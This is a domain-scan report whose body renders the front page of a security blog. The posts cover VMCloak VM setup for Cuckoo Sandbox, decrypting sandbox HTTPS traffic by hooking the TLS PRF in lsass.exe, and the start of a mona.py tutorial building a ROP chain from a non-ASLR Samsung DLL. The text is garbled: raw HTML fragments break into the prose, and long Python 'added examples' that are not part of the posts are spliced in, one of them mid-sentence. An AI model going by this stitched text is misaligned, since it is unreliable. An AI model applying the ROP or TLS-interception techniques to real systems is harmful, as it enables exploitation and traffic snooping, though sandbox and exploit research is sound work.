# Domain: jbremer.org
## Files that talk to jbremer.org

| MD5 | A/V |
| --- | --- |
| 7cb94eaa1d06816787583ec2b21c47cb | |

## DNS Resolutions

| Date | IP Address |
| --- | --- |
| 2013-09-22 | 95.211.160.101 (ClassC) |
| 2024-10-05 | 85.10.192.165 (ClassC) |
## Port 80

HTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 11:17:36 GMT
Server: Apache
X-Pingback: http://jbremer.org/xmlrpc.php
Content-Length: 95880
Content-Type: text/html; charset=UTF-8

The response body is the front page of the WordPress blog "Development & Security | By Jurriaan Bremer @skier_t". The page's own metadata reports generator WordPress 3.4 (a June 2012 release, still served in October 2024), SyntaxHighlighter 3.1.3, Google Analytics account UA-33161212-1, the XML-RPC endpoint http://jbremer.org/xmlrpc.php, and feeds at http://jbremer.org/feed/ and http://jbremer.org/comments/feed/. The posts on the front page follow, rendered from the HTML.

## Revamped VMCloak 0.3

Posted on October 5, 2015 by jbremer (http://jbremer.org/vmcloak3/)
### VMCloak 0.3: Totally revamped & Office support

To quickly summarize: VMCloak is a tool for automatically creating, cloning, and cloaking Virtual Machines to be used for Cuckoo Sandbox.

Earlier this year I released VMCloak 0.2 (http://jbremer.org/vmcloak2/). Now the time has come for the next release, 0.3. Most notable about this release are the revamped command-line usage, the improvements with regard to installing dependencies in the Virtual Machine, and the latest dependency, Office 2007. Thanks to LookingGlass Cyber Solutions (https://lgscout.com/) for supporting the development towards this release, including the Microsoft Office 2007 integration.

### So what about it?

The new command-line interface feels a bit more hipster and less obtuse compared to how its usage used to be. Most importantly, setting up a Virtual Machine is no longer a one-shot action. Instead there are now a couple of different subcommands, each fulfilling its own task. In addition to that the new VMCloak version utilizes the new Cuckoo Agent (https://github.com/jbremer/agent); it is less Cuckoo-specific and features more general-purpose uses, allowing easier communication between the VM and the various VMCloak subcommands.

### The subcommands

As a few new commands are now available it does make sense to elaborate on them a little bit. So here goes. Note that all commands can be run either by calling vmcloak-xyz or vmcloak xyz on the command line.

**vmcloak-init** is the new command to initialize a new Virtual Machine. One can specify a couple of flags, but the most important one is whether this is going to be a Windows XP VM or a Windows 7 VM, and in the case of Windows 7 whether it will be 32-bit or 64-bit (32-bit being the default).

So to get started we can run the following command to create a new 64-bit Windows 7 VM. Note that this will be a VM internal to VMCloak; it can not be used right away in Cuckoo. For Windows XP setups a serial key is also required; on Windows 7 a serial key is optional (by default a dummy key provided by Microsoft is used). And also, just like before (http://jbremer.org/vmcloak2/), you still have to mount the Windows ISO file and set up vboxnet0.

```bash
# Install the latest vmcloak.
sudo pip install vmcloak --upgrade

# Mount the Windows 7 Installer ISO.
sudo mkdir -p /mnt/win7
sudo mount -o loop,ro win7.iso /mnt/win7

# Ensure the hostonly adapter is up.
vmcloak-vboxnet0

# Actually initialize the 64-bit Windows 7 VM.
vmcloak init --win7x64 seven0
```

Fast-forward 15 to 20 minutes: Windows has now been installed in your VM, the VM has been shut down, and the VM has been removed from the VirtualBox interface. All that remains is a VirtualBox harddisk file (.vdi file) in ~/.vmcloak/image and an entry about this new VM in VMCloak's new sqlite3 database.

Moving forward it is time to install a couple of software packages in the VM. Using **vmcloak-install** we will now install all of the currently supported dependencies. The first parameter is the name of our VM, followed by all the dependencies that should be installed.

```bash
vmcloak install seven0 adobe9 wic pillow dotnet40 java7
```

Now to install Office 2007, assuming you have a valid ISO and serial key, one can do so as follows. The ISO path and serial key have to be provided as options to the dependency.

```bash
vmcloak install seven0 office2007 \
    office2007.isopath=/path/to/a.iso \
    office2007.serialkey=ABC-DEF
```

If required one can also easily make manual changes to VMCloak VMs now. By calling **vmcloak-modify** with the VM name as only parameter it is possible to change everything to your liking, and simply by shutting the VM down from within Windows the changes are made persistent. If you are running VMCloak locally then the --vm-visible argument makes sense. For remote interaction with the VM you should enable VRDE support on the VM and connect to it (e.g., through rdesktop -KPz ip:3389).

Finally there is the **vmcloak-snapshot** command which makes a snapshot of your VM. There are a couple of options available for this command, but it mostly comes down to providing the name of the VMCloak VM, the name of the resulting VM as it will be used by Cuckoo, and the static IP address to assign.

```bash
vmcloak snapshot seven0 cuckoo1 192.168.56.101
```

It is important to understand that after creating a snapshot of a VMCloak VM, as one does by running the vmcloak-snapshot command on it, the VMCloak VM becomes immutable. That is, you will no longer be able to run vmcloak-install or vmcloak-modify on it. The reasoning behind this is to save on valuable resources: filling your harddisk is quite easy when you have twenty Windows 7 VMs which each take up to 10GB.

If one decides he or she would like to update a VMCloak VM that is of course still possible. For now the only way down that road is by cloning that particular VMCloak VM. In the following example we clone seven0 to seven0p1 (or, seven0 with one patch applied).

```bash
vmcloak clone seven0 seven0p1
```

I hope to have shed some light on the latest release. Going at it one step at a time, life has just gotten slightly easier again.

## Transparent MITM with Cuckoo Sandbox

Posted on July 26, 2015 by jbremer (http://jbremer.org/mitm/)
### Transparent MITM with Cuckoo Sandbox

In a series of upcoming blogposts I will be sharing a fair amount of cool features that have been worked on over the past year in Cuckoo Sandbox. This first blogpost features Man in the Middle support for Cuckoo Sandbox.

(For those that are familiar with Cuckoo Sandbox and the general ideas behind MITM, please scroll down to the slightly more exciting stuff in the **Transparent snooping of HTTPS traffic** paragraph.)

### So, man in the middle?

As we are well aware, MITM generally describes the process of snooping on otherwise encrypted information, in this case network traffic. In this blogpost we will dive into two different ways of doing MITM:

- Providing a CA Root Certificate to allow a MITM proxy to intercept traffic.
- Transparent dumping of TLS Master Secrets to decrypt TLS traffic.

### Eh, Cuckoo Sandbox?

Before we continue onto the MITM stuff, first a reminder on Cuckoo Sandbox. As some of you will be familiar with, Cuckoo Sandbox (http://cuckoosandbox.org/) is an Open Source Automated Malware Analysis Sandbox. Analyses are performed by starting a VM (Virtual Machine), running the potentially malicious sample, or URL as we will be exploring in this blogpost, inside the VM, and then stopping the VM once the analysis is done.

Due to a personal interest, and that of some of my clients, Cuckoo has been getting much, much better at analyzing Internet Explorer and the like in the past few months. Both in actually analyzing it, but also due to developments outside of the actual analysis, as will be outlined in this blogpost. (For a part of the improvements on the analysis part I would like to thank Brad Spengler for continuously providing feedback and bug fixes.)

### At work with mitmproxy

The first solution to provide MITM support to Cuckoo was to integrate a tool called mitmproxy (http://mitmproxy.org/), created by Aldo Cortesi and maintained by fellow The Honeynet Project (http://honeynet.org/) member Maximilian Hils.

As outlined by the documentation, mitmproxy works by installing a CA Root Certificate (http://mitmproxy.org/doc/certinstall.html) on the target device, in this case a VM running either Windows XP or Windows 7.

After Googling around and looking at GUI dialogs to import certificates into the Windows Certificate store I finally managed to find an easy command-line way to import a certificate (https://github.com/cuckoobox/cuckoo/blob/85d15a81314e9953c58a8fa8102d069eb8aa8abb/analyzer/windows/modules/auxiliary/installcert.py#L35-L36) that only works on Windows 7, not Windows XP. So basically invoking certutil.exe imports a .p12 certificate; this certificate can be found in ~/.mitmproxy after running mitmproxy once (the first time mitmproxy is run on a system it automatically creates a unique set of certificates).

At this point there are two ways to route traffic from the VM into mitmproxy. For the time being I have taken the easy way (https://github.com/cuckoobox/cuckoo/blob/130247f4f2260fe85fd463464c78f1504c34efe2/analyzer/windows/modules/packages/ie.py#L98-L115), which involves explicitly routing traffic through a socks4/5 proxy, but this approach has obvious disadvantages:

- This technique is not compatible with Certificate Pinning (https://www.owasp.org/index.php/Certificate_and_Public_Key_Pinning).
- Looking at the PCAP file, all traffic goes to the proxy.
- Having to explicitly tunnel traffic through socks4/5 translates into this technique not working for anything but Internet Explorer (i.e., at this point no support has been provided for other applications).
- Hostnames are not resolved in the VM. Did I mention all the traffic goes to the proxy?

A better approach would be to route VM traffic to the proxy by the use of a tool such as redsocks (http://darkk.net.ru/redsocks/) (not to be confused with RedSocks (http://redsocks.nl/), a Dutch startup and one of my clients, providing the malware threat defender, a network security appliance for detecting malware infections and other unwanted software in your corporate network). Anyway, a possible drawback of such a tool is the requirement of having to configure it through various root commands, a requirement that generally is not available to Cuckoo once it is running. I have to look into this later. (And also this technique still requires the CA Root Certificate and thus it is not compatible with Certificate Pinning.)

### Transparent snooping of HTTPS traffic

Going a bit more in-depth with HTTPS (https://en.wikipedia.org/wiki/HTTPS) and TLS (https://en.wikipedia.org/wiki/Transport_Layer_Security) we learn that in the TLS protocol (http://www.moserware.com/2009/06/first-few-milliseconds-of-https.html) the client and server exchange a per-session random which, in combination with the master secret (http://security.stackexchange.com/questions/89383/why-does-the-ssl-tls-handshake-have-a-client-and-server-random/89655#89655), can be used to derive the encryption keys, MAC keys, and IVs (when needed), which in turn allow one to fully decrypt the TLS stream.

Reading further we find where and how to intercept the PRF function (http://reverseengineering.stackexchange.com/questions/2681/is-it-possible-to-decrypt-an-ssl-connection-short-of-bruteforcing/2695#2695), by Brendan Dolan-Gavitt, the developer of PANDA (https://github.com/moyix/panda). We also find which information is required to decrypt TLS streams in Wireshark (https://ask.wireshark.org/questions/4229/follow-ssl-stream-using-master-key-and-session-id).

Time to take a step back. So we require the RSA Session ID, which, as defined in the TLS protocol, can be extracted from the Server Hello record. We also require the Master Secret, which, as we have seen, can be extracted from the PRF function call. By instrumenting the PRF function call looking for calls which feature the "key expansion" string (as defined in RFC 2246, http://tools.ietf.org/html/rfc2246#page-21) we see that we can extract the master secret together with the server random: for that particular call the secret argument is the master secret and the seed is server_random followed by client_random, so the first 32 bytes of the seed are the server random.

Long story short. If we extract each pair of server random and master secret from the PRF function in lsass.exe (Brendan outlined that all TLS encryption is performed by the lsass.exe service on Windows, Windows 7 at least), and if we extract Server Hello records from the PCAP file, which link the Session IDs to the server random, then we can cross-reference this information to write the Master Secret file with matching RSA Session ID and Master Secrets for each TLS session that was negotiated during the analysis in the VM. (Note that to cross-reference we extracted the server random in both scenarios, once from the Server Hello record and once from the PRF "key expansion" function call.)

Fast forward various long nights debugging code, many changes and improvements to Cuckoo to be able to facilitate all of this in the first place, and matching the various pieces of extracted information to each other, and we finally conclude with functionality in Cuckoo to dump a tlsmaster.txt file for each analysis.

To recap some facts about this transparent approach:

- It does not require any special handling for the instrumented application, just for the instrumented lsass.exe service.
- Cuckoo can decrypt any TLS/HTTPS stream that uses the Windows API to perform the TLS/HTTPS encryption, including those of Windows Update, etc. (The flip side: an application that ships its own TLS stack instead of going through lsass.exe is not covered by this hook.)
- Since there is no need to proxy the traffic through some 3rd party tool, the PCAP file looks the same as it would without our transparent sniffer.
- As nothing happens with the TLS itself, applications that use Certificate Pinning are supported.

Following is a screenshot showing Wireshark with a PCAP containing decrypted HTTPS traffic of an analysis going to the login page of the Dutch banking website ING using the latest Cuckoo Sandbox:

[Image: Wireshark vs ING (/wp-posts/ing.png)]

### HTTP/HTTPS replay tool

Because I was not really able to find such code elsewhere, and because tshark falls under the not invented here rule, I worked up a small Python project that extracts HTTP and HTTPS streams (https://github.com/jbremer/httpreplay) from a PCAP file with an accompanying TLS Master Secrets file. To be fair, integrating a tool such as tshark with a tool such as Cuckoo Sandbox is suboptimal, as naturally one of the future goals is to include decrypted https traffic in the Cuckoo reports without having to depend on tools like mitmproxy (due to the non-transparency thing).

The final goal of httpreplay will, as one might expect, be to transparently replay HTTP/HTTPS traffic from a PCAP file. At the moment this last step has not been implemented yet, though. Aside from other goals this can be used to reproduce and unittest analysis of certain websites with Cuckoo Sandbox, etc, etc.

Quickly running the httpreplay tool on the same PCAP as shown earlier we find the following output (just URLs of extracted HTTP/HTTPS streams):

```
$ python httpreplay.py dump.pcap tlsmaster.txt
http://mijn.ing.nl/
https://mijn.ing.nl/internetbankieren/
https://mijn.ing.nl/favicon.ico
...
```

Some readers may note this tool is very similar to a thousand others in its field, one of which being CapTipper (https://github.com/omriher/CapTipper), developed by our friends at CheckPoint. At the moment the only added value of httpreplay would be https support (and perhaps proper TCP reassembly and the future goal of being able to operate on multi-gigabyte files; in-memory loading and all that).

### Conclusion

Knowledge about TLS was gained. Tools were reinvented. Cuckoo Sandbox gained some new tricks. I finally wrote another blogpost ;)
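The cross-referencing described in the Transparent snooping section above, as an added example that is neither Cuckoo's code nor the author's: a stand-in for the lsass.exe PRF hook records the (server random, master secret) pair from every "key expansion" call, a minimal parser pulls (server random, session ID) out of ServerHello records, and the two are joined on the server random to produce the `RSA Session-ID:... Master-Key:...` lines Wireshark reads. Everything here is assumed for illustration: the names `PrfHook`, `parse_server_hello`, `build_tlsmaster`, `tls12_prf` and `make_server_hello`, the TLS 1.2 P_SHA256 PRF used to simulate the calls, and the randoms, session ID, premaster secret and records, which are constructed inline rather than taken from a real capture.

```python
"""Join PRF-hook output with PCAP ServerHellos into a Wireshark master-secret
file. Example code, not Cuckoo's; all handshake data below is constructed."""
import hashlib
import hmac
import struct

CONTENT_HANDSHAKE = 0x16  # TLS record type: handshake
HS_SERVER_HELLO = 0x02    # handshake message type: ServerHello


def tls12_prf(secret, label, seed, nbytes):
    """TLS 1.2 PRF, P_SHA256 (RFC 5246 section 5); stands in for the real PRF."""
    out = b""
    a = hmac.new(secret, label + seed, hashlib.sha256).digest()  # A(1)
    while len(out) < nbytes:
        out += hmac.new(secret, a + label + seed, hashlib.sha256).digest()
        a = hmac.new(secret, a, hashlib.sha256).digest()         # A(i+1)
    return out[:nbytes]


class PrfHook:
    """Mimics the lsass.exe instrumentation. In the "key expansion" call
    (RFC 2246/5246 section 6.3) the secret is the master secret and the seed is
    server_random + client_random, so seed[:32] is what we match on later."""

    def __init__(self):
        self.pairs = {}  # server_random -> master_secret

    def prf(self, secret, label, seed, nbytes):
        if label == b"key expansion" and len(secret) == 48 and len(seed) == 64:
            self.pairs[seed[:32]] = secret
        return tls12_prf(secret, label, seed, nbytes)


def parse_server_hello(record):
    """(server_random, session_id) for a record carrying a ServerHello,
    None for any other or truncated record."""
    if len(record) < 5 or record[0] != CONTENT_HANDSHAKE:
        return None
    (rec_len,) = struct.unpack(">H", record[3:5])
    body = record[5:5 + rec_len]
    if len(body) < 4 or body[0] != HS_SERVER_HELLO:
        return None
    hs = body[4:4 + int.from_bytes(body[1:4], "big")]
    if len(hs) < 35:  # version(2) random(32) session_id_len(1) ...
        return None
    server_random, sid_len = hs[2:34], hs[34]
    session_id = hs[35:35 + sid_len]
    if len(session_id) != sid_len:
        return None
    return server_random, session_id


def build_tlsmaster(records, pairs):
    """Emit one 'RSA Session-ID:<hex> Master-Key:<hex>' line per session whose
    server random was seen by both the hook and the capture."""
    lines = []
    for record in records:
        parsed = parse_server_hello(record)
        if parsed is None:
            continue
        server_random, session_id = parsed
        master = pairs.get(server_random)
        # No hook hit means lsass.exe never derived keys for this hello; an
        # empty session ID cannot be keyed by Session-ID in Wireshark at all.
        if master is None or not session_id:
            continue
        lines.append("RSA Session-ID:%s Master-Key:%s"
                     % (session_id.hex(), master.hex()))
    return lines


def make_server_hello(server_random, session_id, cipher_suite=b"\x00\x2f"):
    """Constructed test input: a TLS 1.2 record with a minimal ServerHello."""
    hs = (b"\x03\x03" + server_random + bytes([len(session_id)])
          + session_id + cipher_suite + b"\x00")
    body = bytes([HS_SERVER_HELLO]) + len(hs).to_bytes(3, "big") + hs
    return (bytes([CONTENT_HANDSHAKE]) + b"\x03\x03"
            + struct.pack(">H", len(body)) + body)


def demo():
    """Simulate one RSA handshake in the VM plus the matching PCAP records."""
    hook = PrfHook()
    client_random = bytes(range(32))           # constructed
    server_random = bytes(range(32, 64))       # constructed
    session_id = bytes.fromhex("aa" * 32)      # constructed
    premaster = b"\x03\x03" + b"\x11" * 46     # constructed, not a real one
    # The two calls the TLS stack makes: master secret, then key expansion.
    master = hook.prf(premaster, b"master secret",
                      client_random + server_random, 48)
    hook.prf(master, b"key expansion", server_random + client_random, 104)
    records = [b"\x17\x03\x03\x00\x01\x00",    # an application-data record
               make_server_hello(server_random, session_id)]
    return build_tlsmaster(records, hook.pairs), master


if __name__ == "__main__":
    for line in demo()[0]:
        print(line)
```

Two things worth noting about the join key. Because the seed of the "key expansion" call also carries the client random (`seed[32:]`), a hook could equally write Wireshark's `CLIENT_RANDOM <hex> <hex>` lines, which do not depend on the server sending a non-empty session ID and so also cover sessions that would be skipped by `build_tlsmaster` above. And the record parser assumes one handshake message per record; a real PCAP path needs TCP reassembly first, which is exactly the gap the httpreplay project mentioned below sets out to fill.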
## VMCloak 0.2: Windows 7 Support

Posted on March 18, 2015 by jbremer (http://jbremer.org/vmcloak2/)

### VMCloak 0.2: Windows 7 Support

A couple of months ago I released (http://jbremer.org/vmcloak) the first version of VMCloak (https://github.com/jbremer/vmcloak); now it's time for version 0.2. VMCloak is a tool for automatically creating and configuring Virtual Machines for Cuckoo Sandbox (http://cuckoosandbox.org/).

### What's new?

In this version of VMCloak we introduce the long-awaited **Windows 7** support. This means VMCloak can now automatically create and configure Windows 7 virtual machines for Cuckoo Sandbox.

### Usage

Those who have used VMCloak in the past will see that creating Windows 7 virtual machines is now just as easy as creating Windows XP virtual machines. Creating a Windows 7 virtual machine goes as follows:

```bash
# Install the latest vmcloak.
sudo pip install vmcloak --upgrade

# Mount the Windows 7 Installer ISO.
sudo mkdir -p /mnt/win7
sudo mount -o loop,ro win7.iso /mnt/win7

# Ensure VirtualBox hostonly adapter is up.
vmcloak-vboxnet0

# Create a Win7 VM with the name win7vm.
# This will take about 15 to 20 minutes.
vmcloak -r --win7x64 win7vm
```

Besides a couple of internal changes, the only thing that changed for Windows XP support is that you'll now have to specify --winxp when creating a Windows XP virtual machine, for example:

```bash
vmcloak -r --winxp winxp0 --serial-key AAAAA..EEEEE
```

### 32-bit vs 64-bit

With Windows 7 in mind, it makes sense that VMCloak now supports both 32-bit and 64-bit Windows 7 installations. This mostly means that VMCloak will install a 64-bit version of the .NET framework, the 64-bit version of the Microsoft C Runtime, etc. For this to work, however, you'll have to inform VMCloak that the 64-bit libraries should be used instead of the 32-bit ones. This can either be achieved by passing the --x64 flag to vmcloak, or by combining the --win7 and --x64 flags straight into the --win7x64 flag.

(The upcoming version of Cuckoo Sandbox, version 1.3, will support **64-bit analysis**!)

### VMCloak Birds

Those who want to deploy multiple virtual machines in a relatively short time window while preserving as many resources as possible might like VMCloak's **bird** feature. VirtualBox has immutable disks: disks that are created once and then never changed; any changes on top of the immutable disk are then written to a new VirtualBox disk. VMCloak uses this to create a bird image, a fully installed and configured Windows installation. Creating a Virtual Machine ready to be used by Cuckoo Sandbox out of this bird image then consists of a couple of steps:

- Create a new Virtual Machine.
- Attach the immutable bird image.
- Boot into Windows.
- Configure a unique static IP address for this VM.
- Run Cuckoo and take a snapshot of the VM.

Naturally all these steps are handled by **vmcloak-clone**.

Bird images are **crucial** when running a Cuckoo Sandbox instance with more than a handful of VMs on one machine. Whereas creating a new VM with Windows 7 installed, such as a bird image, takes about 15 minutes of time and almost 10GB of disk space, creating a clone of a bird image takes less than a minute and less than 1GB per clone. Note that you'll still need the bird image, also after cloning! (Basically, instead of installing Windows 7 10 times for 10 VMs, the bird image allows you to install Windows 7 once and then re-use this installation.)

Following is a quick guide to setting up 10 VMs using a VMCloak bird. Running these commands should take up to half an hour to finish; just enough to go for lunch.

```bash
# Create the 64-bit Windows 7 Bird.
vmcloak -r --win7x64 --bird win7bird

# Create 10 VMs.
for i in {0..9}; do
    vmcloak-clone -r --bird win7bird win7_$i
done
```

### What's next?

As always further cloaking the VMs is on the roadmap. If anyone has tricks & tips on known detection vectors that would be useful for VMCloak, please do let me know. E.g., registry keys containing known values specific to virtualization software, etc.

Other than that, I've been working hard on 64-bit analysis for Cuckoo Sandbox for a while now, so there's that ;) And a bunch of other new and upcoming features in Cuckoo.

### Contact

For any questions or suggestions, please feel free to reach out to me (jurriaanbremer_at_gmail_dot_com).

## VMCloak: Automated Virtual Machine Generation and Cloaking for Cuckoo Sandbox
Posted on September 22, 2014 by jbremer (http://jbremer.org/vmcloak/), 2 comments

### VMCloak: Automated Virtual Machine Generation and Cloaking

Today I present you a tool that I've been working on for a while, vmcloak (http://vmcloak.org/). For those of you familiar with Cuckoo Sandbox (http://cuckoosandbox.org/) and setting it up, you'll surely be aware of the pain that is **configuring virtual machines**.

### VMCloak 101

Somewhat complete documentation can be found at readthedocs.org (http://vmcloak.readthedocs.org/en/latest/); however, a quick introduction of the related commands is of course the easiest. (**Do note that VMCloak has mostly been tested on Ubuntu/Debian, so other distributions might not work, yet.**)

Basically you need a few things to get started:

- vmcloak (**sudo pip install vmcloak**)
- Windows XP Installer ISO file
- Windows XP Serial Key (that works with your installer!)
- genisoimage & VirtualBox (**sudo apt-get install genisoimage virtualbox**)
- Two directories for VirtualBox files.

First we have to mount the Windows installer ISO file (http://vmcloak.readthedocs.org/en/latest/config.html#conf-mounted-iso):

```bash
sudo mkdir -p /mnt/winxp
sudo mount -o loop,ro /path/to/your/winxp.iso /mnt/winxp
```

Now we have to start vboxnet0 if it has not already been started (http://vmcloak.readthedocs.org/en/latest/vbox.html):

```bash
# If this returns nothing, then vboxnet0 hasn't
# been started.
VBoxManage list hostonlyifs

# Create vboxnet0 and assign the correct IP address.
VBoxManage hostonlyif create
VBoxManage hostonlyif ipconfig vboxnet0 --ip 192.168.56.1
```

And then two directories are required: a directory where VirtualBox's snapshot files will be stored, and a directory where the VirtualBox harddisk files and installer ISO files will be stored. Note that you might want to place the snapshot files in a tmpfs container to ensure VMs load pretty much instantly.

```bash
mkdir ~/vms/ ~/vm-data/
```

Having set up the mount directory, the hostonly interface, and the VirtualBox directories we're now good to go with regards to creating our first VM with VMCloak. It is recommended to use the **recommended settings** by providing the **-r** switch. By default the hostonly IP address will be set to 192.168.56.101; however, if you intend to create multiple VMs then you'll have to give each VM a unique IP address (i.e., 192.168.56.102, 192.168.56.103, etc.). In order to automatically register the newly created VM with Cuckoo you'll have to set the **cuckoo directory**, so we'll do this as well.

We're now going to make a VM with the name **cuckoo1** and the IP address **192.168.56.101**:

```bash
vmcloak -r -d --vm-dir ~/vms/ --data-dir ~/vm-data/ \
    --iso-mount /mnt/winxp --serial-key AAAAA...EEEEE \
    --hostonly-ip 192.168.56.101 --cuckoo ~/cuckoo/ \
    cuckoo1
```

The **-d** switch causes vmcloak to spit out debugging messages which may be helpful in some cases. This command will take **up to 30 minutes** to finish; on the machines I've tested it's usually less than or roughly 10 minutes.

So.. get yourself something to drink, wait for a bit, and you should have a VM ready to be used by Cuckoo.

### Allowing VMs full internet access

It is possible to give VMs full internet access (http://vmcloak.readthedocs.org/en/latest/network.html), even **after** creating them, without modifying the VMs themselves. If your network configuration is "regular" (i.e., a working internet connection at either **eth0** or **wlan0**) then you'll only have to run one command:

```bash
sudo vmcloak-iptables
```

Keep in mind that this hands a VM that will be running malware a route to the internet through your host; only do so on a network where that is acceptable.

### TODO

Of course this is a never-ending project and it's still actively being developed ;) Things on the TODO list include, but are not limited to:

- Windows 7 support
- Further VM cloaking (making the VM as stealth as possible)
- VMWare Workstation support
- Support for installing Adobe / Microsoft Office / etc in the VM
- Loads more..

### Source

Of course there's an official website (http://vmcloak.org/) and naturally the source code can be found on github (https://github.com/jbremer/vmcloak).

### Credits

Further credits go to Thorsten Sick of Avira (http://avira.com/) and a special thanks to Avira and the iTES Project (http://www.ites-project.org/index_en.html) for supporting the development of this tool.

So much for today!
Hope the tool will be useful for people and if there arebr />any questions don’t hesitate to email me or so./p>p>ps: Please don’t tell me about using strong>vagrant/strong> or similar instead ofbr />something custom built unless you’ve actually used it together with Cuckoo img srchttp://jbremer.org/wp-includes/images/smilies/icon_razz.gif alt:P classwp-smiley /> /p> /div>!-- .entry-content --> footer classentry-meta> span classcat-links> span classentry-utility-prep entry-utility-prep-cat-links>Posted in/span> a hrefhttp://jbremer.org/category/uncategorized/ titleView all posts in Uncategorized relcategory tag>Uncategorized/a> /span> span classsep> | /span> span classcomments-link>a hrefhttp://jbremer.org/vmcloak/#comments titleComment on VMCloak: Automated Virtual Machine Generation and Cloaking for Cuckoo Sandbox>b>2/b> Replies/a>/span> /footer>!-- #entry-meta --> /article>!-- #post-214 --> article idpost-209 classpost-209 post type-post status-publish format-standard hentry category-uncategorized> header classentry-header> h1 classentry-title>a hrefhttp://jbremer.org/mona-101-a-global-samsung-dll/ titlePermalink to Mona 101: a Global Samsung DLL relbookmark>Mona 101: a Global Samsung DLL/a>/h1> div classentry-meta> span classsep>Posted on /span>a hrefhttp://jbremer.org/mona-101-a-global-samsung-dll/ title3:06 am relbookmark>time classentry-date datetime2013-12-08T03:06:19+00:00 pubdate>December 8, 2013/time>/a>span classby-author> span classsep> by /span> span classauthor vcard>a classurl fn n hrefhttp://jbremer.org/author/jbremer/ titleView all posts by jbremer relauthor>jbremer/a>/span>/span> /div>!-- .entry-meta --> div classcomments-link> a hrefhttp://jbremer.org/mona-101-a-global-samsung-dll/#comments titleComment on Mona 101: a Global Samsung DLL>1/a> /div> /header>!-- .entry-header --> div classentry-content> style>li p { margin: 0; padding: 0;}/* undo stupid brs by wordpress */br { display: none;}/style>h1>Mona 101: a Global Samsung DLL/h1>p>This 
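The setup steps above, as an added example that is not VMCloak's own code: a small planner that checks the prerequisites from the post (mounted ISO, vboxnet0 at 192.168.56.1, the two VirtualBox directories) and derives one vmcloak invocation per VM with a unique hostonly IP. The `VBoxManage list hostonlyifs` sample output is constructed, and the serial key is a placeholder.

```python
"""
Added example (not part of VMCloak): plan the vmcloak invocations for N Cuckoo
VMs, each with its own hostonly IP, after checking the post's prerequisites.
"""
import os
import shlex
import subprocess

HOSTONLY_PREFIX = "192.168.56."   # vboxnet0 itself is 192.168.56.1 in the post
FIRST_GUEST_HOST = 101            # vmcloak's default VM address is 192.168.56.101

# Constructed sample of 'VBoxManage list hostonlyifs' output (values made up).
SAMPLE_HOSTONLYIFS = """Name:            vboxnet0
GUID:            786f6276-656e-4074-8000-0a0027000000
DHCP:            Disabled
IPAddress:       192.168.56.1
NetworkMask:     255.255.255.0
IPV6Address:
IPV6NetworkMaskPrefixLength: 0
HardwareAddress: 0a:00:27:00:00:00
MediumType:      Ethernet
Status:          Up
VBoxNetworkName: HostInterfaceNetworking-vboxnet0
"""


def hostonly_ip(index):
    """Unique guest address for the index-th VM (1 -> .101, 2 -> .102, ...)."""
    host = FIRST_GUEST_HOST + index - 1
    if index < 1 or host > 254:
        raise ValueError("VM index %d does not fit in the hostonly /24" % index)
    return HOSTONLY_PREFIX + str(host)


def parse_hostonlyifs(output):
    """Map interface name -> IPAddress from 'VBoxManage list hostonlyifs'.

    An empty mapping is the 'returns nothing' case from the post: no hostonly
    interface exists yet and vboxnet0 still has to be created."""
    ifaces, current = {}, None
    for line in output.splitlines():
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "Name":
            current = value
            ifaces[current] = None
        elif key == "IPAddress" and current is not None:
            ifaces[current] = value
    return ifaces


def vmcloak_command(name, index, iso_mount, serial_key, vm_dir, data_dir, cuckoo_dir):
    """argv list for one VM, mirroring the command line shown in the post."""
    return [
        "vmcloak", "-r", "-d",
        "--vm-dir", vm_dir, "--data-dir", data_dir,
        "--iso-mount", iso_mount, "--serial-key", serial_key,
        "--hostonly-ip", hostonly_ip(index), "--cuckoo", cuckoo_dir,
        name,
    ]


def plan_vms(count, **kw):
    """Commands for cuckoo1..cuckooN; every VM gets a distinct hostonly IP."""
    return [vmcloak_command("cuckoo%d" % i, i, **kw) for i in range(1, count + 1)]


def check_prerequisites(iso_mount, vm_dir, data_dir, hostonlyifs_output):
    """Return a list of human-readable problems (empty when all is well)."""
    problems = []
    if not os.path.isdir(iso_mount) or not os.listdir(iso_mount):
        problems.append("%s is not a mounted installer ISO" % iso_mount)
    for d in (vm_dir, data_dir):
        if not os.path.isdir(d):
            problems.append("directory %s does not exist" % d)
    if parse_hostonlyifs(hostonlyifs_output).get("vboxnet0") != "192.168.56.1":
        problems.append("vboxnet0 is missing or not configured as 192.168.56.1")
    return problems


if __name__ == "__main__":
    import sys
    try:
        listing = subprocess.check_output(["VBoxManage", "list", "hostonlyifs"]).decode()
    except (OSError, subprocess.CalledProcessError):
        listing = ""
    home = os.path.expanduser("~")
    kw = dict(iso_mount="/mnt/winxp", serial_key="AAAAA...EEEEE",   # placeholder key
              vm_dir=home + "/vms/", data_dir=home + "/vm-data/",
              cuckoo_dir=home + "/cuckoo/")
    for problem in check_prerequisites(kw["iso_mount"], kw["vm_dir"], kw["data_dir"], listing):
        print("problem:", problem)
    count = int(sys.argv[1]) if len(sys.argv) > 1 else 1
    for argv in plan_vms(count, **kw):
        print(" ".join(shlex.quote(a) for a in argv))
```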
blogpost will be just another 101 for [mona.py](http://redmine.corelan.be/projects/mona). There's already a good introduction to / full documentation of mona [here](https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/), including setting it up and running it for the first time. (Which is surprisingly easy, at least with Immunity Debugger – I haven't tested mona with WinDBG.)

## Our target

Well, it turns out that a dll called **WinCRT.dll**, developed by Samsung and distributed by default on at least a set of Samsung laptops, is being loaded in every process that imports **user32.dll** on my system.. Yay! Needless to say it doesn't have *ASLR* enabled, nor does it rebase by default. If you haven't guessed its base address by now, then I'll give you a hint; 0x10000000. A copy of the DLL can be found [here](/wp-posts/samsung-wincrt.dll) – naturally I'm not responsible for whatever you do with it :p

Btw, the path of this Samsung DLL is: **C:\Program Files (x86)\Samsung\Movie Color Enhancer\WinCRT.dll**

## Generate some ROP

After running any program which imports user32, such as the following MessageBox() program, we attach Immunity Debugger to it.

```cpp
#include <windows.h>

int main()
{
    MessageBoxA(NULL, "Hello Samsung!", ":-)", 0);
}
```

We run the following command and get our ROP chain after roughly 10 seconds:

```
!mona rop -m wincrt -rva
```

As documented in the tutorials that were linked earlier in this blogpost, the **-m** switch specifies the module to search, and **-rva** gives a dump with addresses relative to the base address. (In case you need an infoleak to obtain the base address of your target module, rather than having a DLL that's being loaded at a static address.)

The ROP chain returned may look like the following, including some comments about what the registers should look like at the point that *VirtualAlloc* is invoked.

```python
"""
Register setup for VirtualAlloc() :
 EAX = NOP (0x90909090)
